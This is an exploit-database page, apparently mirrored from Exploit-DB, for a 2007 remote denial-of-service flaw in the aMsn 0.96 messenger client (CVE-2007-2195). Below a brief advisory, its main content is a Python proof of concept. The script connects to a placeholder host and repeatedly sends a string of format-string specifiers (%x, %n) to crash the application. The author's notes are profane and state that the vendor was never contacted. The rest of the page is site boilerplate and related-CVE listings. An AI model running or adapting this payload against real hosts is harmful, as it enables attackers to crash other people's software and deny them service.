Lucene search
+L

AMSN 0.96 - Malformed Message Denial of Service

🗓️ 21 Apr 2007 00:00:00Reported by Levent KayanType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 22 Views

aMsn 0.96 - Remote Denial of Service due to Exceptional Condition Handling Failur

Related
Code
ReporterTitlePublishedViews
Family
cve
CVE
CVE-2007-2195
24 Apr 200717:00
cve
cvelist
Cvelist
CVE-2007-2195
24 Apr 200717:00
cvelist
euvd
EUVD
EUVD-2007-2190
7 Oct 202500:30
euvd
nvd
NVD
CVE-2007-2195
24 Apr 200717:19
nvd
prion
Prion
Code injection
24 Apr 200717:19
prion
ubuntucve
UbuntuCve
CVE-2007-2195
24 Apr 200717:19
ubuntucve
source: https://www.securityfocus.com/bid/23583/info

aMsn is prone to a remote denial-of-service vulnerability because the application fails to handle exceptional conditions.

An attacker can exploit this issue to crash the affected application, denying service to legitimate users.

This issue affects aMsn 0.96 and prior versions.

import socket

HOST = 'victim.com'
PORT = 31337
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((HOST, PORT))
i = 1
while i <= 3:
   s.send('abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890\
          ?!"?$%&/()=?`#+#-.,;:_??????%X%X%X%X%X%XXX%X%x%x%x%x%x%x%x%x%x%n%n%n\
          %n%n%n%n%n%n\????#?[{#?]?#\`~??')

---fuck off here---

I think it were the character '}', '{' or '%x', '%n'. Try to determine this for
yourself! Don't bug me with this shit.

/* Vendor contacted? */
NO! Why should I contact them? :) lol, go away and contact them yourself.

/* EOF */

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

28 Nov 2013 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 25
EPSS0.03338
22